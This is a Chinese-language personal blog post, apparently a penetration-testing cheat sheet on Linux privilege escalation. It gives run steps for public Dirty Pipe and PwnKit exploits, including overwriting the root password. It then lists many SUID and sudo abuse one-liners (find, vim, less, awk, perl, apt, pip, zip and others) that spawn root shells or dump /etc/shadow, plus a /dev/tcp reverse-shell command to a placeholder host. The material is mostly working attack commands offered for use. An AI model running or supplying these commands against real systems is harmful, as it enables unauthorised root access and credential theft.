

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/book.png">
  <link rel="icon" href="/img/book.png">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="ixpqxi">
  <meta name="keywords" content="">
  
    <meta name="description" content="一、Linux提权 (1)通过利用漏洞提权 1、CVE-2016-5195（&quot;脏牛&quot;漏洞） 2、CVE-2022-0847  https:&#x2F;&#x2F;github.com&#x2F;Arinerron&#x2F;CVE-2022-0847-DirtyPipe-Exploit.git 123+ 利用前提 5.8 &lt;&#x3D; Linux kernel &lt; 5.16.11&#x2F;5.15.25&#x2F;5.10.102 123+ 利用流程">
<meta property="og:type" content="article">
<meta property="og:title" content="权限提升">
<meta property="og:url" content="https://ixpqxi.github.io/2022/08/20/46bb6cfbfdcb/index.html">
<meta property="og:site_name" content="Blog">
<meta property="og:description" content="一、Linux提权 (1)通过利用漏洞提权 1、CVE-2016-5195（&quot;脏牛&quot;漏洞） 2、CVE-2022-0847  https:&#x2F;&#x2F;github.com&#x2F;Arinerron&#x2F;CVE-2022-0847-DirtyPipe-Exploit.git 123+ 利用前提 5.8 &lt;&#x3D; Linux kernel &lt; 5.16.11&#x2F;5.15.25&#x2F;5.10.102 123+ 利用流程">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-08-20T07:55:24.000Z">
<meta property="article:modified_time" content="2025-10-26T05:08:47.410Z">
<meta property="article:author" content="ixpqxi">
<meta property="article:tag" content="web security">
<meta name="twitter:card" content="summary_large_image">
  
  
  
  <title>权限提升 - Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"ixpqxi.github.io","root":"/","version":"1.9.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":"49a544c5bc9684d15c82cd27375dd996","google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  
    <!-- Baidu Analytics -->
    <script async>
      if (!Fluid.ctx.dnt) {
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?49a544c5bc9684d15c82cd27375dd996";
          var s = document.getElementsByTagName("script")[0];
          s.parentNode.insertBefore(hm, s);
        })();
      }
    </script>
  

  
    <!-- Google tag (gtag.js) -->
    <script async>
      if (!Fluid.ctx.dnt) {
        Fluid.utils.createScript("https://www.googletagmanager.com/gtag/js?id=", function() {
          window.dataLayer = window.dataLayer || [];
          function gtag() {
            dataLayer.push(arguments);
          }
          gtag('js', new Date());
          gtag('config', '');
        });
      }
    </script>
  

  

  

  

  



  
<meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="Blog" type="application/atom+xml">
</head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>ixpqxi</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/projects/" target="_self">
                <i class="iconfont icon-code"></i>
                <span>项目</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/default.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="权限提升"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2022-08-20 15:55" pubdate>
          2022年8月20日 下午
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          1.8k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          16 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">权限提升</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="一linux提权">一、Linux提权</h1>
<h2 id="通过利用漏洞提权">(1)通过利用漏洞提权</h2>
<h4 id="cve-2016-5195脏牛漏洞">1、CVE-2016-5195（"脏牛"漏洞）</h4>
<h4 id="cve-2022-0847">2、CVE-2022-0847</h4>
<ul>
<li><pre><code class="hljs">https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit.git
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> 利用前提<br><br></code></pre></td></tr></table></figure>
5.8 &lt;= Linux kernel &lt; 5.16.11/5.15.25/5.10.102
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> 利用流程<br><br></code></pre></td></tr></table></figure>
1.将项目上传到目标主机
2.在文件夹下运行./compile.sh
3.运行./exploit
4.运行后root用户的密码被修改为aaron，通过su命令输入密码进行提权
<figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs clean"><br>#### <span class="hljs-number">3</span>、CVE<span class="hljs-number">-2021</span><span class="hljs-number">-4034</span><br><br>+ 参考链接<br><br></code></pre></td></tr></table></figure>
http://its.dlut.edu.cn/info/1054/78309.htm
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> 漏洞介绍<br><br>  权限提升漏洞（CVE-2021-4034)是由于pkexec无法正确处理调用参数，从而将环境变量作为命令执行，具有任意用户权限的攻击者都可以在默认配置下通过修改环境变量来利用此漏洞，从而获得受影响主机的root权限。<br><br><span class="hljs-bullet">+</span> 影响范围<br><br>  Polkit预装在CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等多个Linux发行版上，所有存在Polkit的Linux系统均受影响。<br><br>  不受影响的Linux版本:<br><br></code></pre></td></tr></table></figure>
CentOS：
  CentOS 6：polkit-0.96-11.el6_10.2
  CentOS 7：polkit-0.112-26.el7_9.1
  CentOS 8.0：polkit-0.115-13.el8_5.1
  CentOS 8.2：polkit-0.115-11.el8_2.2
  CentOS 8.4：polkit-0.115-11.el8_4.2

Ubuntu：
  Ubuntu 14.04 ESM：policykit-1-0.105-4ubuntu3.14.04.6+esm1
  Ubuntu 16.04 ESM：policykit-1-0.105-14.1ubuntu0.5+esm1
  Ubuntu 18.04 LTS：policykit-1-0.105-20ubuntu0.18.04.6
  Ubuntu 20.04 LTS：policykit-1-0.105-26ubuntu1.2
  Ubuntu 21.10：policykit-1-0.105-31ubuntu0.1

Debain：
  Debain stretch：policykit-1 0.105-18+deb9u2
  Debain buster：policykit-1 0.105-25+deb10u1
  Debain bullseye：policykit-1 0.105-31+deb11u1
  Debain bookworm,bullseye：policykit-1 0.105-31.1
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> 版本检测<br><br><span class="hljs-bullet">  +</span> CentOS<br><br></code></pre></td></tr></table></figure>
  rpm -qa polkit
  <figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> Ubuntu<br><br></code></pre></td></tr></table></figure>
  dpkg -l policykit-1
  <figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> 漏洞利用<br><br><span class="hljs-bullet">  +</span> 漏洞利用项目<br><br></code></pre></td></tr></table></figure>
  https://github.com/berdav/CVE-2021-4034.git
  <figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> 将利用文件上传到目标主机<br><br><span class="hljs-bullet">+</span> 在文件夹下编译<br><br></code></pre></td></tr></table></figure>
  make
  <figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> 运行漏洞利用程序<br><br></code></pre></td></tr></table></figure>
  ./cve-2021-4034
  <figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> 运行后成功会返回一个root权限的shell，如果失败程序会自动退出，显示:<br><br></code></pre></td></tr></table></figure>
  pkexec --version |
         --help |
         --disable-internal-agent |
         [--user username] PROGRAM [ARGUMENTS...]

  See the pkexec manual page for more details.
  <figure class="highlight clean"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs clean"><br>## (<span class="hljs-number">2</span>)通过第三方应用提权<br><br>#### <span class="hljs-number">1</span>、利用应用的suid提权<br><br>+ suid是Linux中的一种特殊权限,其功能为用户运行某个程序时，如果该程序有SUID权限，那么程序运行为进程时，进程的属主不是发起者，而是程序文件所属的属主。在执行过程中，调用者会暂时获得该文件的所有者权限,且该权限只在程序执行的过程中有效.。所以可以通过利用具有suid权限的第三方应用提权。<br><br>+ 常见具有suid权限的Linux可执行文件<br><br></code></pre></td></tr></table></figure>
find、vim、less、cp、namp、more、nano
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> 通过命令寻找具有suid权限的可执行文件<br><br></code></pre></td></tr></table></figure>
find / -perm -u=s -type f 2&gt;/dev/null
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs"><br>或<br><br></code></pre></td></tr></table></figure>
find / -user root -perm -4000 -print 2&gt;/dev/null
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs"><br>或<br><br></code></pre></td></tr></table></figure>
find / -user root -perm -4000 -exec ls -ldb &#123;&#125;;
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> 具体利用过程<br><br><span class="hljs-bullet">  +</span> find的suid提权<br><br><span class="hljs-code">    1.执行whoami</span><br><span class="hljs-code"></span><br></code></pre></td></tr></table></figure>
  &gt;find / -exec whoami \; -quit
  root
  <figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs autohotkey"><br>注：如果不加`-quit`命令会多次执行，加后只执行一次后退出<br><br><span class="hljs-number">2</span>.启动一个本地root权限的shell<br><br></code></pre></td></tr></table></figure>
  find / -exec /bin/sh \; -quit
  <figure class="highlight basic"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs basic"><br><span class="hljs-number">3</span>.启动一个远程的root权限的<span class="hljs-keyword">shell</span><br><br></code></pre></td></tr></table></figure>
  find / -exec bash -ip &gt;&amp; /dev/tcp/[ip]/[port] 0&gt;&amp;1 \; -quit
  <figure class="highlight mipsasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs mipsasm"><br>+ <span class="hljs-keyword">bash提权</span><br><span class="hljs-keyword"></span><br>  <span class="hljs-number">1</span>.确定<span class="hljs-keyword">bash具有suid权限</span><br><span class="hljs-keyword"></span><br></code></pre></td></tr></table></figure>
  &gt;ls -al /bin/bash
  -rwsr-sr-x 1 root root 1234376 Feb 24  2021 /bin/bash
  <figure class="highlight basic"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs basic"><br><span class="hljs-number">2</span>.启动一个本地root权限的<span class="hljs-keyword">shell</span><br><br></code></pre></td></tr></table></figure>
  bash -p
  <figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs autohotkey"><br>  注：如果shell启动时有效用户(组)id不等于实际用户(组)id，在调用时提供-p选项，则启动行为(权限)相同，但有效用户id未重置。<br><br>+ vi / vim的suid提权<br><br>  如果vim程序具有suid权限，可以访问`/etc/shadow`文件获取用户密码的加密值，随后使用`john`工具暴力破解或直接修改为已知密码的加密值。<br><br></code></pre></td></tr></table></figure>
  vim /etc/shadow
  <figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs autohotkey"><br>+ less的suid提权<br><br>  也是泄露`/etc/shadow`文件的内容<br><br></code></pre></td></tr></table></figure>
  less /etc/shadow
  <figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs autohotkey"><br>+ more的suid提权<br><br>  也是泄露`/etc/shadow`文件的内容<br><br></code></pre></td></tr></table></figure>
  more /etc/shadow
  <figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs autohotkey"><br>+ curl提权<br><br>  也是泄露`/etc/shadow`文件的内容<br><br></code></pre></td></tr></table></figure>
  curl file:///etc/shadow
  <figure class="highlight autohotkey"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs autohotkey"><br>+ man提权<br><br>  也是泄露`/etc/shadow`文件的内容<br><br></code></pre></td></tr></table></figure>
  man /etc/shadow
  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs bash"><br>  + <span class="hljs-built_in">mv</span>或<span class="hljs-built_in">cp</span>提权<br><br>    使用<span class="hljs-built_in">mv</span>或使用<span class="hljs-built_in">cp</span>的提权的原理就是制作已知密码的shadow或passwd文件，通过复制覆盖原本的`/etc/shadow`文件或`/etc/passwd`文件<br><br><span class="hljs-comment">#### 2、利用sudo命令提权</span><br><br>+ 该方式是在低权限用户拥有运行<span class="hljs-built_in">sudo</span>命令的权限时进行提权，该方式提权的原理和使用的某些应用很类似，但利用前提有区别。用户在使用<span class="hljs-built_in">sudo</span>命令时需要输入当前用户密码，所以该方式需要破解到用户的密码(有时用户配置了不需要密码，该情况就很容易提权了)。在渗透时，如果发现同个可执行文件存在suid权限和使用<span class="hljs-built_in">sudo</span>权限，那两种方式都可用；如果只存在suid权限或只存在使用<span class="hljs-built_in">sudo</span>，那只能用相应的一种。在实际中用户的使用<span class="hljs-built_in">sudo</span>权限有如下3种情况：<br><br></code></pre></td></tr></table></figure>
1.全部命令都可以使用sudo
2.只有部分命令可以使用sudo
3.该用户不可使用sudo
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><br>+ 通过命令获取该用户可执行<span class="hljs-built_in">sudo</span>的命令<br><br></code></pre></td></tr></table></figure>
sudo -l
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> 具体利用过程<br><br><span class="hljs-bullet">  +</span> find的sudo提权<br><br><span class="hljs-code">    和find的suid提权类似，只是加多个sudo命令，随后需要输入当前用户密码即可</span><br><span class="hljs-code"></span><br></code></pre></td></tr></table></figure>
  sudo find / -exec whoami \; -quit
  <figure class="highlight cmake"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs cmake"><br>+ <span class="hljs-keyword">less</span>的sudo提权<br><br>  原理与<span class="hljs-keyword">less</span>的suid提权有所不同，该方式是利用sudo命令执行<span class="hljs-keyword">less</span>使得其获得高权限，随后在内部执行命令从而返回一个高权限的shell<br><br>  <span class="hljs-number">1</span>.使用带sudo的<span class="hljs-keyword">less</span><br><br></code></pre></td></tr></table></figure>
  sudo less [file_name]
  <figure class="highlight basic"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs basic"><br><span class="hljs-number">2</span>.在less的命令行模式输入命令调用<span class="hljs-keyword">shell</span><br><br></code></pre></td></tr></table></figure>
  :!/bin/sh
  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><br>+ more的<span class="hljs-built_in">sudo</span>提权<br><br></code></pre></td></tr></table></figure>
  sudo more [file_name]
  <figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">  <br></code></pre></td></tr></table></figure>
  !/bin/sh
  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><br>+ vim的<span class="hljs-built_in">sudo</span>提权<br><br></code></pre></td></tr></table></figure>
  sudo vim
  <figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">  <br></code></pre></td></tr></table></figure>
  :set shell=/bin/sh
  :shell
  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><br>+ nano的<span class="hljs-built_in">sudo</span>提权<br><br></code></pre></td></tr></table></figure>
  sudo nano
  <figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">  <br></code></pre></td></tr></table></figure>
  curl+T      \\[^T]
  <figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">  <br></code></pre></td></tr></table></figure>
  whoami
  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><br>+ man的<span class="hljs-built_in">sudo</span>提权<br><br></code></pre></td></tr></table></figure>
  sudo man man
  <figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">  <br></code></pre></td></tr></table></figure>
  !/bin/sh
  <figure class="highlight nix"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs nix"><br><span class="hljs-operator">+</span> awk <span class="hljs-symbol">/</span> gawk <span class="hljs-symbol">/</span> mawk提权<br><br></code></pre></td></tr></table></figure>
  sudo awk &#39;BEGIN&#123;system(&quot;/bin/sh&quot;)&#125;&#39;
  <figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs">  <br>或<br>  <br></code></pre></td></tr></table></figure>
  sudo gawk &#39;BEGIN&#123;system(&quot;/bin/sh&quot;)&#125;&#39;
  <figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs">  <br>或<br>  <br></code></pre></td></tr></table></figure>
  sudo mawk &#39;BEGIN&#123;system(&quot;/bin/sh&quot;)&#125;&#39;
  <figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><br>+ <span class="hljs-built_in">env</span>提权<br><br></code></pre></td></tr></table></figure>
  sudo env /bin/sh
  <figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> ftp提权<br><br></code></pre></td></tr></table></figure>
  sudo ftp
  <figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">  <br></code></pre></td></tr></table></figure>
  ftp&gt; !/bin/sh
  <figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> perl提权<br><br></code></pre></td></tr></table></figure>
  sudo perl -e &#39;exec &quot;/bin/sh&quot;;&#39;
  <figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> tmux提权<br><br></code></pre></td></tr></table></figure>
  sudo tmux
  <figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> apt提权<br><br></code></pre></td></tr></table></figure>
  TF=$(mktemp)
  echo &#39;Dpkg::Pre-Invoke &#123;&quot;/bin/sh;false&quot;&#125;&#39; &gt; $TF
  sudo apt-get install -c $TF sl
  <figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> ed提权<br><br></code></pre></td></tr></table></figure>
  sudo ed
  <figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">  <br></code></pre></td></tr></table></figure>
  !/bin/sh
  <figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> pip提权<br><br></code></pre></td></tr></table></figure>
  TF=$(mktemp -d)
  echo &quot;import os; os.execl(&#39;/bin/sh&#39;, &#39;sh&#39;, &#39;-c&#39;, &#39;sh &lt;$(tty) &gt;$(tty) 2&gt;$(tty)&#39;)&quot; &gt; $TF/setup.py
  sudo pip install $TF
  <figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> git提权<br><br></code></pre></td></tr></table></figure>
  sudo git -p help
  <figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs markdown"><br><span class="hljs-bullet">+</span> zip提权<br><br></code></pre></td></tr></table></figure>
  sudo zip -T --unzip-command=&quot;sh -c /bin/bash&quot;
